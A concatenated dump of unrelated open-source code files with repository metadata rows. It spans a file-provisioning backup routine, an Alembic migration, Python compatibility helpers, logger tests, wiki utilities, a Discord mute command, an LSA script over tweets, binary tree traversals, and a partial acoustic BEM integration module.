elif os.path.exists(filename) and FileTool.is_same_file(os.path.realpath(filename), attribs["content"]):
log.info("Symbolic link %s already exists", filename)
continue
parent = os.path.dirname(filename)
if not os.path.isdir(parent):
if not os.path.exists(parent):
log.debug("Parent directory %s does not exist, creating", parent)
os.makedirs(parent)
else:
raise ToolError("Parent directory %s exists and is a file" % parent)
with self.backup(filename, files_changed):
if file_is_link:
log.debug("%s is specified as a symbolic link to %s", filename, attribs['content'])
os.symlink(attribs["content"], filename)
else:
file_is_text = 'content' in attribs and not self._is_base64(attribs)
with file(filename, 'w' + ('' if file_is_text else 'b')) as f:
log.debug("Writing content to %s", filename)
self._write_file(f, attribs, auth_config)
if "mode" in attribs:
log.debug("Setting mode for %s to %s", filename, attribs["mode"])
os.chmod(filename, stat.S_IMODE(int(attribs["mode"], 8)))
else:
log.debug("No mode specified for %s", filename)
security.set_owner_and_group(filename, attribs.get("owner"), attribs.get("group"))
return files_changed
@contextmanager
def backup(self, filename, files_changed):
backup_file = None
backup_backup_file = None
if os.path.exists(filename):
log.debug("%s already exists", filename)
backup_file = filename + '.bak'
if os.path.exists(backup_file):
backup_backup_file = backup_file + "2"
if os.path.exists(backup_backup_file):
os.remove(backup_backup_file)
self._backup_file(backup_file, backup_backup_file)
self._backup_file(filename, backup_file)
try:
yield backup_file
except Exception:
if backup_file:
try:
if os.path.exists(filename):
os.remove(filename)
self._backup_file(backup_file, filename)
if backup_backup_file:
self._backup_file(backup_backup_file, backup_file)
except ToolError, t:
log.warn("Error restoring %s from backup", filename)
raise
else:
linkmode = backup_file and os.path.islink(backup_file) or os.path.islink(filename)
# we assume any symbolic links changed because we short-circuit links to the same files early on
if not backup_file or linkmode or not FileTool.compare_file_contents(backup_file, filename):
files_changed.append(filename)
if backup_backup_file:
os.remove(backup_backup_file)
elif backup_file and backup_backup_file:
try:
self._backup_file(backup_backup_file, backup_file)
except ToolError, t:
log.warn("Error restoring backup file %s: %s", backup_file, str(t))
def _backup_file(self, source, dest):
try:
log.debug("Moving %s to %s", source, dest)
os.rename(source, dest)
except OSError, e:
log.error("Could not move %s to %s", source, dest)
raise ToolError("Could not rename %s: %s" % (source, str(e)))
def _is_base64(self, attribs):
return attribs.get("encoding", "plain") == "base64"
def _write_file(self, dest_fileobj, attribs, auth_config):
content = attribs.get("content", "")
if content:
self._write_inline_content(dest_fileobj, content, self._is_base64(attribs),
attribs.get('context'))
else:
source = attribs.get("source", "")
if not source:
raise ToolError("File specified without source or content")
log.debug("Retrieving contents from %s", source)
try:
self._write_remote_file(source, auth_config.get_auth(attribs.get('authentication', None)), dest_fileobj,
attribs.get('context'))
except IOError, e:
raise ToolError("Failed to retrieve %s: %s" % (source, e.strerror))
def _render_template(self, content, context):
if not _templates_supported:
raise ToolError("Pystache must be installed in order to render files as Mustache templates")
log.debug('Rendering as Mustache template')
try:
return Renderer(string_encoding='utf-8', file_encoding='utf-8').render(content, context)
except Exception, e:
raise ToolError("Failed to render content as a Mustache template: %s" % e.message)
@util.retry_on_failure()
def _write_remote_file(self, source, auth, dest, context):
opts = util.req_opts({'auth': auth})
remote_contents = util.EtagCheckedResponse(requests.get(source, **opts))
if context is None:
remote_contents.write_to(dest)
else:
dest.write(self._render_template(remote_contents.contents(), context))
def _write_inline_content(self, dest, content, is_base64, context):
if not isinstance(content, basestring):
log.debug('Content will be serialized as a JSON structure')
json.dump(content, dest)
return
if is_base64:
try:
log.debug("Decoding base64 content")
dest.write(base64.b64decode(content.strip()))
except TypeError:
raise ToolError("Malformed base64: %s" % content)
elif context is None:
dest.write(content)
else:
dest.write(self._render_template(content, context))
| mit | 8,430,033,312,722,759,000 | 38.760331 | 120 | 0.567242 | false |
matslindh/kimochi | alembic/versions/8f5b2066cbac_add_self_referential_image_reference.py | 1 | 2160 | """Add self-referential image reference
Revision ID: 8f5b2066cbac
Revises: 698cc06661d6
Create Date: 2016-03-20 19:35:31.321144
"""
# revision identifiers, used by Alembic.
revision = '8f5b2066cbac'
down_revision = '698cc06661d6'
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
with op.batch_alter_table('images', schema=None) as batch_op:
batch_op.create_index(batch_op.f('ix_images_gallery_id'), ['gallery_id'], unique=False)
batch_op.create_index(batch_op.f('ix_images_site_id'), ['site_id'], unique=False)
batch_op.create_foreign_key('ix_images_parent_image_id', 'images', ['parent_image_id'], ['id'])
batch_op.create_foreign_key('ix_sites_site_id', 'sites', ['site_id'], ['id'])
batch_op.create_foreign_key('ix_galleries_gallery_id', 'galleries', ['gallery_id'], ['id'])
with op.batch_alter_table('pages_sections_layout_settings', schema=None) as batch_op:
batch_op.create_index(batch_op.f('ix_pages_sections_layout_settings_page_section_id'), ['page_section_id'], unique=False)
with op.batch_alter_table('sites_settings', schema=None) as batch_op:
batch_op.drop_index('ix_sites_settings_site_id')
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
with op.batch_alter_table('sites_settings', schema=None) as batch_op:
batch_op.create_index('ix_sites_settings_site_id', ['site_id'], unique=False)
with op.batch_alter_table('pages_sections_layout_settings', schema=None) as batch_op:
batch_op.drop_index(batch_op.f('ix_pages_sections_layout_settings_page_section_id'))
with op.batch_alter_table('images', schema=None) as batch_op:
batch_op.drop_constraint(None, type_='foreignkey')
batch_op.drop_constraint(None, type_='foreignkey')
batch_op.drop_constraint(None, type_='foreignkey')
batch_op.drop_index(batch_op.f('ix_images_site_id'))
batch_op.drop_index(batch_op.f('ix_images_gallery_id'))
### end Alembic commands ###
| mit | 7,596,053,783,737,711,000 | 40.538462 | 129 | 0.678241 | false |
akalipetis/raven-python | raven/_compat.py | 1 | 5038 | """Utilities for writing code that runs on Python 2 and 3"""
# flake8: noqa
# Copyright (c) 2010-2013 Benjamin Peterson
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from __future__ import absolute_import
import operator
import sys
import types
__author__ = "Benjamin Peterson <[email protected]>"
__version__ = "1.3.0"
PY2 = sys.version_info[0] == 2
if not PY2:
string_types = str,
integer_types = int,
class_types = type,
text_type = str
binary_type = bytes
MAXSIZE = sys.maxsize
else:
string_types = basestring,
integer_types = (int, long)
class_types = (type, types.ClassType)
text_type = unicode
binary_type = str
if sys.platform.startswith("java"):
# Jython always uses 32 bits.
MAXSIZE = int((1 << 31) - 1)
else:
# It's possible to have sizeof(long) != sizeof(Py_ssize_t).
class X(object):
def __len__(self):
return 1 << 31
try:
len(X())
except OverflowError:
# 32-bit
MAXSIZE = int((1 << 31) - 1)
else:
# 64-bit
MAXSIZE = int((1 << 63) - 1)
del X
def _import_module(name):
"""Import module, returning the module after the last dot."""
__import__(name)
return sys.modules[name]
if not PY2:
_iterkeys = "keys"
_itervalues = "values"
_iteritems = "items"
_iterlists = "lists"
else:
_iterkeys = "iterkeys"
_itervalues = "itervalues"
_iteritems = "iteritems"
_iterlists = "iterlists"
try:
advance_iterator = next
except NameError:
def advance_iterator(it):
return it.next()
next = advance_iterator
try:
callable = callable
except NameError:
def callable(obj):
return any("__call__" in klass.__dict__ for klass in type(obj).__mro__)
def iterkeys(d, **kw):
"""Return an iterator over the keys of a dictionary."""
return iter(getattr(d, _iterkeys)(**kw))
def itervalues(d, **kw):
"""Return an iterator over the values of a dictionary."""
return iter(getattr(d, _itervalues)(**kw))
def iteritems(d, **kw):
"""Return an iterator over the (key, value) pairs of a dictionary."""
return iter(getattr(d, _iteritems)(**kw))
def iterlists(d, **kw):
"""Return an iterator over the (key, [values]) pairs of a dictionary."""
return iter(getattr(d, _iterlists)(**kw))
if not PY2:
def b(s):
return s.encode("latin-1")
def u(s):
return s
if sys.version_info[1] <= 1:
def int2byte(i):
return bytes((i,))
else:
# This is about 2x faster than the implementation above on 3.2+
int2byte = operator.methodcaller("to_bytes", 1, "big")
import io
StringIO = io.StringIO
BytesIO = io.BytesIO
else:
def b(s): # NOQA
return s
def u(s): # NOQA
return unicode(s, "unicode_escape")
int2byte = chr
import StringIO
StringIO = BytesIO = StringIO.StringIO
if not PY2:
import builtins
exec_ = getattr(builtins, "exec")
def reraise(tp, value, tb=None):
if value.__traceback__ is not tb:
raise value.with_traceback(tb)
raise value
del builtins
else:
def exec_(_code_, _globs_=None, _locs_=None):
"""Execute code in a namespace."""
if _globs_ is None:
frame = sys._getframe(1)
_globs_ = frame.f_globals
if _locs_ is None:
_locs_ = frame.f_locals
del frame
elif _locs_ is None:
_locs_ = _globs_
exec("""exec _code_ in _globs_, _locs_""")
exec_("""def reraise(tp, value, tb=None):
raise tp, value, tb
""")
def with_metaclass(meta, base=object):
"""Create a base class with a metaclass."""
return meta("NewBase", (base,), {})
def get_code(func):
rv = getattr(func, '__code__', getattr(func, 'func_code', None))
if rv is None:
raise TypeError('Could not get code from %r' % type(func).__name__)
return rv
| bsd-3-clause | -442,859,743,706,172,900 | 26.380435 | 82 | 0.618499 | false |
moto-timo/robotframework | utest/output/test_filelogger.py | 1 | 1867 | import unittest
import time
from robot.output.filelogger import FileLogger
from robot.utils import StringIO, robottime
from robot.utils.asserts import *
from robot.utils.robottime import TimestampCache
class _FakeTimeCache(TimestampCache):
def __init__(self):
self.fake = time.mktime((2006, 6, 13, 8, 37, 42, 0, 0, 1)) + 0.123
TimestampCache.__init__(self)
def _get_epoch(self):
return self.fake
class TestFileLogger(unittest.TestCase):
def setUp(self):
robottime.TIMESTAMP_CACHE = _FakeTimeCache()
FileLogger._get_writer = lambda *args: StringIO()
self.logger = FileLogger('whatever', 'INFO')
def tearDown(self):
robottime.TIMESTAMP_CACHE = TimestampCache()
def test_write(self):
self.logger.write('my message', 'INFO')
expected = '20060613 08:37:42.123 | INFO | my message\n'
self._verify_message(expected)
self.logger.write('my 2nd msg\nwith 2 lines', 'ERROR')
expected += '20060613 08:37:42.123 | ERROR | my 2nd msg\nwith 2 lines\n'
self._verify_message(expected)
def test_write_helpers(self):
self.logger.info('my message')
expected = '20060613 08:37:42.123 | INFO | my message\n'
self._verify_message(expected)
self.logger.warn('my 2nd msg\nwith 2 lines')
expected += '20060613 08:37:42.123 | WARN | my 2nd msg\nwith 2 lines\n'
self._verify_message(expected)
def test_set_level(self):
self.logger.write('msg', 'DEBUG')
self._verify_message('')
self.logger.set_level('DEBUG')
self.logger.write('msg', 'DEBUG')
self._verify_message('20060613 08:37:42.123 | DEBUG | msg\n')
def _verify_message(self, expected):
assert_equals(self.logger._writer.getvalue(), expected)
if __name__ == "__main__":
unittest.main()
| apache-2.0 | 1,760,009,257,251,679,000 | 31.189655 | 80 | 0.636315 | false |
loleg/realms-wiki | realms/lib/util.py | 1 | 3701 | import click
import re
import os
import hashlib
import json
import string
import random
import sys
from jinja2 import Template
class AttrDict(dict):
def __init__(self, *args, **kwargs):
super(AttrDict, self).__init__(*args, **kwargs)
self.__dict__ = self
def random_string(size=6, chars=string.ascii_lowercase + string.ascii_uppercase + string.digits):
return ''.join(random.choice(chars) for _ in range(size))
def to_json(data):
return json.dumps(to_dict(data), separators=(',', ':'))
def to_dict(data):
if not data:
return AttrDict()
def row2dict(row):
d = AttrDict()
for column in row.__table__.columns:
d[column.name] = getattr(row, column.name)
return d
if isinstance(data, list):
return [row2dict(x) for x in data]
else:
return row2dict(data)
def mkdir_safe(path):
if path and not(os.path.exists(path)):
os.makedirs(path)
return path
def extract_path(file_path):
if not file_path:
return None
last_slash = file_path.rindex("/")
if last_slash:
        return file_path[0:last_slash]
def clean_path(path):
if path:
if path[0] != '/':
            path = '/' + path
return re.sub(r"//+", '/', path)
def extract_name(file_path):
if file_path[-1] == "/":
return None
return os.path.basename(file_path)
def remove_ext(path):
return os.path.splitext(path)[0]
def clean_url(url):
if not url:
return url
url = url.replace('%2F', '/')
url = re.sub(r"^/+", "", url)
return re.sub(r"//+", '/', url)
def to_canonical(s):
"""
    Whitespace -> single dash
Double dash -> single dash
Remove .md file extension
Remove all non alphanumeric and dash
Limit to first 64 chars
"""
s = s.encode('ascii', 'ignore')
s = str(s)
s = re.sub(r"\s\s*", "-", s)
s = re.sub(r"\-\-+", "-", s)
s = re.sub(r"\.md$", "", s)
s = re.sub(r"[^a-zA-Z0-9\-]", "", s)
s = s[:64]
return s
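# Illustrative example of the rules above (assumed result, not a doctest):
#     to_canonical("My Wiki Page.md")  ->  "My-Wiki-Page"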
def cname_to_filename(cname):
""" Convert canonical name to filename
:param cname: Canonical name
:return: str -- Filename
"""
return cname + ".md"
def filename_to_cname(filename):
"""Convert filename to canonical name.
.. note::
It's assumed filename is already canonical format
"""
return os.path.splitext(filename)[0]
def gravatar_url(email):
return "https://www.gravatar.com/avatar/" + hashlib.md5(email).hexdigest()
def in_virtualenv():
return hasattr(sys, 'real_prefix')
def in_vagrant():
return os.path.isdir("/vagrant")
def is_su():
return os.geteuid() == 0
def green(s):
click.secho(s, fg='green')
def yellow(s):
click.secho(s, fg='yellow')
def red(s):
click.secho(s, fg='red')
def upstart_script(user='root', app_dir=None, port=5000, workers=2, path=None):
script = """
limit nofile 65335 65335
respawn
description "Realms Wiki"
author "[email protected]"
chdir {{ app_dir }}
{% if path %}
env PATH={{ path }}:/usr/local/bin:/usr/bin:/bin:$PATH
export PATH
{% endif %}
env LC_ALL=en_US.UTF-8
env GEVENT_RESOLVER=ares
export LC_ALL
export GEVENT_RESOLVER
setuid {{ user }}
setgid {{ user }}
start on runlevel [2345]
stop on runlevel [!2345]
respawn
exec gunicorn \
--name realms-wiki \
--access-logfile - \
--error-logfile - \
--worker-class gevent \
--workers {{ workers }} \
--bind 0.0.0.0:{{ port }} \
--user {{ user }} \
--group {{ user }} \
--chdir {{ app_dir }} \
'realms:create_app()'
"""
template = Template(script)
return template.render(user=user, app_dir=app_dir, port=port, workers=workers, path=path)
| gpl-2.0 | -2,907,286,904,536,917,000 | 17.979487 | 97 | 0.597406 | false |
zekroTJA/regiusBot | commands/cmd_mute.py | 1 | 2707 | import discord
from os import path, makedirs, remove
import STATICS
ROLE_NAME = "Supporter"
perm = 2
description = "Mute members on guild in chat"
def get_mutes(server):
if not path.isdir("SAVES/" + server.id):
makedirs("SAVES/" + server.id)
if path.isfile("SAVES/" + server.id + "/mutes"):
with open("SAVES/" + server.id + "/mutes") as f:
return [line.replace("\n", "") for line in f.readlines()]
else:
return []
def add_mute(member, server):
mutelist = get_mutes(server)
mutelist.append(member.id)
try:
remove("SAVES/" + server.id + "/mutes")
except:
pass
with open("SAVES/" + server.id + "/mutes", "w") as fw:
[(lambda x: fw.write(x + "\n"))(line) for line in mutelist]
def rem_mute(member, server):
mutelist = get_mutes(server)
mutelist.remove(member.id)
try:
remove("SAVES/" + server.id + "/mutes")
except:
pass
with open("SAVES/" + server.id + "/mutes", "w") as fw:
        [(lambda x: fw.write(x + "\n"))(line) for line in mutelist]
def get_member(id, server):
return discord.utils.get(server.members, id=id)
async def check_mute(message, client):
if not message.channel.is_private:
if get_mutes(message.server).__contains__(message.author.id):
await client.send_message(message.author, embed=discord.Embed(color=discord.Color.red(), description="Sorry, but you got muted on this server! Contact a supporter to get unmuted."))
await client.delete_message(message)
async def ex(message, client):
if message.content.replace(STATICS.PREFIX + "mute ", "") == "list":
muted_str = "\n".join([get_member(line, message.server).name for line in get_mutes(message.server)]) if len(get_mutes(message.server)) > 0 else "no one"
await client.send_message(message.channel, embed=discord.Embed(description="**MUTED MEMBERS\n\n**" + muted_str))
elif len(message.mentions) < 1:
await client.send_message(message.channel, embed=discord.Embed(color=discord.Color.red(), description="Please mention the user you want to mute!"))
elif get_mutes(message.server).__contains__(message.mentions[0].id):
rem_mute(message.mentions[0], message.server)
await client.send_message(message.channel, embed=discord.Embed(color=discord.Color.green(), description=("%s got unmuted by %s." % (message.mentions[0].mention, message.author.mention))))
else:
add_mute(message.mentions[0], message.server)
await client.send_message(message.channel, embed=discord.Embed(color=discord.Color.orange(), description=("%s got muted by %s." % (message.mentions[0].mention, message.author.mention))))
| mit | 6,176,478,198,408,302,000 | 39.402985 | 195 | 0.655707 | false |
Dinoshauer/linie | tests/test_handlers.py | 1 | 2635 | """Linie handlers test specs."""
import logging
from testfixtures import LogCapture
from unittest import TestCase
from linie import handlers, exceptions
from linie.handlers import DEFAULT_FORMAT, _check_keys, _check_values, _get_fmts
class TestStreamHandlerPrivates(TestCase):
"""Test private functions of the stream handler."""
def setUp(self):
"""Set up mocks."""
self.mock_fmts = {
'date': '%Y-%m-%d %H:%M:%S',
'log': '%(asctime)s [%(levelname)s] %(message)s',
}
def test__check_keys(self):
"""Assert that the function can compare two lists."""
result = _check_keys(self.mock_fmts.keys(), self.mock_fmts.keys())
assert result is True
with self.assertRaises(exceptions.InvalidListError):
_check_keys(['foo'], ['bar'])
def test__check_values(self):
"""The function can check that a list of values is a specific type."""
result = _check_values(self.mock_fmts.values(), str)
assert result is True
with self.assertRaises(exceptions.InvalidValueType):
_check_values([1], str)
def test__get_fmts(self):
"""The function should return a tuple of ``str``s."""
result = _get_fmts(self.mock_fmts, DEFAULT_FORMAT)
assert type(result) is tuple
assert type(result[0]) is str
assert type(result[1]) is str
assert result[0] == self.mock_fmts['log']
assert result[1] == self.mock_fmts['date']
class TestStreamHandler(TestCase):
"""Test the functionality of the stream handler itself."""
@staticmethod
def _generate_check(levels, msg, name):
"""Generate the list of tuples that is needed to check logged items."""
result = []
for level in levels:
result.append((name, level.upper(), msg))
return result
def setUp(self):
"""Set up mocks."""
self.log_name = 'test-logger'
self.msg = 'Hello, world!'
self.levels = ['info', 'debug', 'warning', 'error', 'critical']
self.check_logs = self._generate_check(self.levels, self.msg,
self.log_name)
def test_stream_handler(self):
"""Assert the stream handlers functionality."""
with LogCapture() as l:
logger = logging.getLogger(self.log_name)
logger.addHandler(handlers.stream())
for level in self.levels:
getattr(logger, level)(self.msg)
# l.check will raise an AssertionError if its
            # internal checks go wrong.
l.check(*self.check_logs)
| mit | 7,705,936,456,296,599,000 | 34.133333 | 80 | 0.599241 | false |
totalgood/nlpia | src/nlpia/scripts/lsa_tweets.py | 1 | 3415 | import os
import gc
import json
import numpy as np
import gzip
from gensim.models import TfidfModel, LsiModel
from gensim.corpora import Dictionary
from nlpia.data.loaders import BIGDATA_PATH, read_csv
KEEP_N = 300000 # max vocab size
NO_BELOW = 5 # min DF (count)
NO_ABOVE = .7 # max DF (fraction)
def lsa_twitter(cased_tokens=None):
    """ Latent Semantic Analysis (LSA) on a random sampling of twitter search results for the words listed in cased_tokens """
# Only 5 of these tokens are saved for a no_below=2 filter:
# PyCons NLPS #PyCon2016 #NaturalLanguageProcessing #naturallanguageprocessing
if cased_tokens is None:
cased_tokens = ('PyConOpenSpaces PyCon PyCon2017 PyCon2018 PyCon2016 PyCon2015 OpenSpace PyconTutorial ' +
'NLP NaturalLanguageProcessing NLPInAction NaturalLanguageProcessingInAction NLPIA Twote Twip'
).split()
cased_tokens += [s + 's' for s in cased_tokens]
cased_tokens += 'TotalGood TotalGoods HobsonLane Hob Hobs TotalGood.com ' \
'www.TotalGood.com http://www.TotalGood.com https://www.TotalGood.com'.split()
allcase_tokens = cased_tokens + [s.lower() for s in cased_tokens]
allcase_tokens += [s.title() for s in cased_tokens]
allcase_tokens += [s.upper() for s in cased_tokens]
KEEP_TOKENS = allcase_tokens + ['#' + s for s in allcase_tokens]
# takes 15 minutes and 10GB of RAM for 500k tweets if you keep all 20M unique tokens/names URLs
vocab_path = os.path.join(BIGDATA_PATH, 'vocab939370.pkl')
if os.path.isfile(vocab_path):
print('Loading vocab: {} ...'.format(vocab_path))
vocab = Dictionary.load(vocab_path)
print(' len(vocab) loaded: {}'.format(len(vocab.dfs)))
else:
tweets_path = os.path.join(BIGDATA_PATH, 'tweets.csv.gz')
print('Loading tweets: {} ...'.format(tweets_path))
tweets = read_csv(tweets_path)
tweets = np.array(tweets.text.str.split())
with gzip.open(os.path.join(BIGDATA_PATH, 'tweets.txt.gz'), 'w') as f:
for tokens in tweets:
f.write((' '.join(tokens) + '\n').encode('utf-8'))
# tweets['text'] = tweets.text.apply(lambda s: eval(s).decode('utf-8'))
# tweets['user'] = tweets.user.apply(lambda s: eval(s).decode('utf-8'))
# tweets.to_csv('tweets.csv.gz', compression='gzip')
print('Computing vocab from {} tweets...'.format(len(tweets)))
vocab = Dictionary(tweets, no_below=NO_BELOW, no_above=NO_ABOVE, keep_tokens=set(KEEP_TOKENS))
vocab.filter_extremes(no_below=NO_BELOW, no_above=NO_ABOVE, keep_n=KEEP_N, keep_tokens=set(KEEP_TOKENS))
print(' len(vocab) after filtering: {}'.format(len(vocab.dfs)))
    # no time at all, just a bookkeeping step, doesn't actually compute anything
tfidf = TfidfModel(id2word=vocab, dictionary=vocab)
tfidf.save(os.path.join(BIGDATA_PATH, 'tfidf{}.pkl'.format(len(vocab.dfs))))
tweets = [vocab.doc2bow(tw) for tw in tweets]
json.dump(tweets, gzip.open(os.path.join(BIGDATA_PATH, 'tweet_bows.json.gz'), 'w'))
gc.collect()
    # LSA is a more useful name than LSI
lsa = LsiModel(tfidf[tweets], num_topics=200, id2word=vocab, extra_samples=100, power_iters=2)
return lsa
if __name__ == '__main__':
lsa = lsa_twitter()
# these models can be big
lsa.save(os.path.join(BIGDATA_PATH, 'lsa_tweets'))
| mit | -2,815,172,349,528,805,000 | 42.782051 | 118 | 0.656223 | false |
ResolveWang/algrithm_qa | binarytree/q1.py | 1 | 3054 | """
Problem: implement the preorder, inorder, and postorder traversals of a binary tree, both recursively and non-recursively (iteratively).
Approach: the non-recursive versions use an explicit auxiliary stack in place of the function call stack.
"""
from binarytree.toolcls import Node
class RecursiveVisit:
@classmethod
def visit_in_first_order(cls, head):
if head is None:
return
print(head.value, end=' ')
cls.visit_in_first_order(head.left)
cls.visit_in_first_order(head.right)
@classmethod
def visit_in_mid_order(cls, head):
if head is None:
return
cls.visit_in_mid_order(head.left)
print(head.value, end=' ')
cls.visit_in_mid_order(head.right)
@classmethod
def visit_in_last_order(cls, head):
if head is None:
return
cls.visit_in_last_order(head.left)
cls.visit_in_last_order(head.right)
print(head.value, end=' ')
class LoopVisit:
@classmethod
def visit_in_first_order(cls, head):
if head is None:
return
stack = list()
stack.append(head)
while len(stack) > 0:
node = stack.pop()
print(node.value, end=' ')
if node.right is not None:
stack.append(node.right)
if node.left is not None:
stack.append(node.left)
@classmethod
def visit_in_mid_order(cls, head):
if head is None:
return
stack = list()
cur = head
while len(stack) > 0 or cur is not None:
if cur is not None:
stack.append(cur)
cur = cur.left
else:
cur = stack.pop()
print(cur.value, end=' ')
cur = cur.right
@classmethod
def visit_in_last_order(cls, head):
if head is None:
return
stack1 = list()
stack2 = list()
cur = head
stack1.append(cur)
while len(stack1) > 0:
cur = stack1.pop()
if cur.left is not None:
stack1.append(cur.left)
if cur.right is not None:
stack1.append(cur.right)
stack2.append(cur.value)
while len(stack2) > 0:
print(stack2.pop(), end=' ')
if __name__ == '__main__':
head = Node(5)
head.left = Node(3)
head.right = Node(8)
head.left.left = Node(2)
head.left.right = Node(4)
head.left.left.left = Node(1)
head.right.left = Node(7)
head.right.left.left = Node(6)
head.right.right = Node(10)
head.right.right.left = Node(9)
head.right.right.right = Node(11)
RecursiveVisit.visit_in_first_order(head)
print()
LoopVisit.visit_in_first_order(head)
print()
print('===========================')
RecursiveVisit.visit_in_mid_order(head)
print()
LoopVisit.visit_in_mid_order(head)
print()
print('===========================')
RecursiveVisit.visit_in_last_order(head)
print()
LoopVisit.visit_in_last_order(head)
print() | mit | -6,681,515,285,919,521,000 | 24.153846 | 48 | 0.532631 | false |
Gjacquenot/AcousticBEM | Python/HelmholtzIntegralsRAD.py | 1 | 15968 | # ---------------------------------------------------------------------------
# Copyright (C) 2017 Frank Jargstorff
#
# This file is part of the AcousticBEM library.
# AcousticBEM is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# AcousticBEM is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with AcousticBEM. If not, see <http://www.gnu.org/licenses/>.
# ---------------------------------------------------------------------------
import numpy as np
from numpy.linalg import norm
from HelmholtzIntegrals2D import ComplexQuad
from Geometry import Normal2D
class CircularIntegratorPi(object):
"""
Integrator class for integrating the upper half-circle or in other
    words, integrate a function along the unit arc over angles
theta in [0, pi].
"""
samples = np.array([[0.980144928249, 5.061426814519E-02],
[0.898333238707, 0.111190517227],
[0.762766204958, 0.156853322939],
[0.591717321248, 0.181341891689],
[0.408282678752, 0.181341891689],
[0.237233795042, 0.156853322939],
[0.101666761293, 0.111190517227],
[1.985507175123E-02, 5.061426814519E-02]], dtype=np.float32)
def __init__(self, segments):
self.segments = segments
nSamples = segments * self.samples.shape[0]
self.rotationFactors = np.empty((nSamples, 2), dtype=np.float32)
factor = np.pi / self.segments
for i in range(nSamples):
arcAbscissa = i / self.samples.shape[0] + self.samples[i % self.samples.shape[0], 0]
arcAbscissa *= factor
self.rotationFactors[i, :] = np.cos(arcAbscissa), np.sin(arcAbscissa)
def integrate(self, func):
sum = 0.0
for n in range(self.rotationFactors.shape[0]):
sum += self.samples[n % self.samples.shape[0], 1] * func(self.rotationFactors[n, :])
return sum * np.pi / self.segments
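# Illustrative sanity check (not part of the original source): the sample
# weights of each segment sum to one, so integrating the constant function 1.0
# over theta in [0, pi] returns approximately pi:
#
#     CircularIntegratorPi(1).integrate(lambda x: 1.0)   # ~= 3.14159...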
def ComplexQuadGenerator(func, start, end):
"""
This is a variation on the basic complex quadrature function from the
base class. The difference is, that the abscissa values y**2 have been
substituted for x. Kirkup doesn't explain the details of why this
is helpful for the case of this kind of 2D integral evaluation, but points
to his PhD thesis and another reference that I have no access to.
"""
samples = np.array([[0.980144928249, 5.061426814519E-02],
[0.898333238707, 0.111190517227],
[0.762766204958, 0.156853322939],
[0.591717321248, 0.181341891689],
[0.408282678752, 0.181341891689],
[0.237233795042, 0.156853322939],
[0.101666761293, 0.111190517227],
[1.985507175123E-02, 5.061426814519E-02]], dtype=np.float32)
vec = end - start
sum = 0.0
for n in range(samples.shape[0]):
x = start + samples[n, 0]**2 * vec
sum += samples[n, 1] * func(x) * samples[n, 0]
return 2.0 * sum * norm(vec)
def ComplexQuadCone(func, start, end, segments = 1):
delta = 1.0 / segments * (end - start)
sum = 0.0
for s in range(segments):
sum += ComplexQuad(func, start + s * delta, start + (s+1) * delta)
return sum
def ComputeL(k, p, qa, qb, pOnElement):
qab = qb - qa
    # subdivided circular integral into sections of
# similar size as qab
q = 0.5 * (qa + qb)
nSections = 1 + int(q[0] * np.pi / norm(qab))
if pOnElement:
ap = p - qa
if k == 0.0:
def generatorFunc(x):
circle = CircularIntegratorPi(2 * nSections)
r = x[0]
z = x[1]
p3 = np.array([p[0], 0.0, p[1]], dtype=np.float32)
def circleFunc(x):
q3 = np.array([r * x[0], r * x[1], z], dtype=np.float32)
rr = q3 - p3
return 1.0 / norm(rr)
return circle.integrate(circleFunc) * r / (2.0 * np.pi)
return ComplexQuadGenerator(generatorFunc, p, qa) + ComplexQuadGenerator(generatorFunc, p, qb)
else:
def generatorFunc(x):
circle = CircularIntegratorPi(2 * nSections)
r = x[0]
z = x[1]
p3 = np.array([p[0], 0.0, p[1]], dtype=np.float32)
def circleFunc(x):
q3 = np.array([r * x[0], r * x[1], z], dtype=np.float32)
rr = q3 - p3
RR = norm(rr)
return (np.exp(1.0j * k * RR) - 1.0) / RR
return circle.integrate(circleFunc) * r / (2.0 * np.pi)
return ComputeL(0.0, p, qa, qb, True) + ComplexQuad(generatorFunc, qa, qb)
else:
if k == 0.0:
def generatorFunc(x):
circle = CircularIntegratorPi(nSections)
r = x[0]
z = x[1]
p3 = np.array([p[0], 0.0, p[1]], dtype=np.float32)
def circleFunc(x):
q3 = np.array([r * x[0], r * x[1], z], dtype=np.float32)
rr = q3 - p3
return 1.0 / norm(rr)
return circle.integrate(circleFunc) * r / (2.0 * np.pi)
return ComplexQuad(generatorFunc, qa, qb)
else:
def generatorFunc(x):
circle = CircularIntegratorPi(nSections)
r = x[0]
z = x[1]
p3 = np.array([p[0], 0.0, p[1]], dtype=np.float32)
def circleFunc(x):
q3 = np.array([r * x[0], r * x[1], z], dtype=np.float32)
rr = q3 - p3
RR = norm(rr)
return np.exp(1.0j * k * RR) / RR
return circle.integrate(circleFunc) * r / (2.0 * np.pi)
return ComplexQuad(generatorFunc, qa, qb)
return 0.0
def ComputeM(k, p, qa, qb, pOnElement):
qab = qb - qa
vec_q = Normal2D(qa, qb)
    # subdivided circular integral into sections of
# similar size as qab
q = 0.5 * (qa + qb)
nSections = 1 + int(q[0] * np.pi / norm(qab))
if k == 0.0:
def generatorFunc(x):
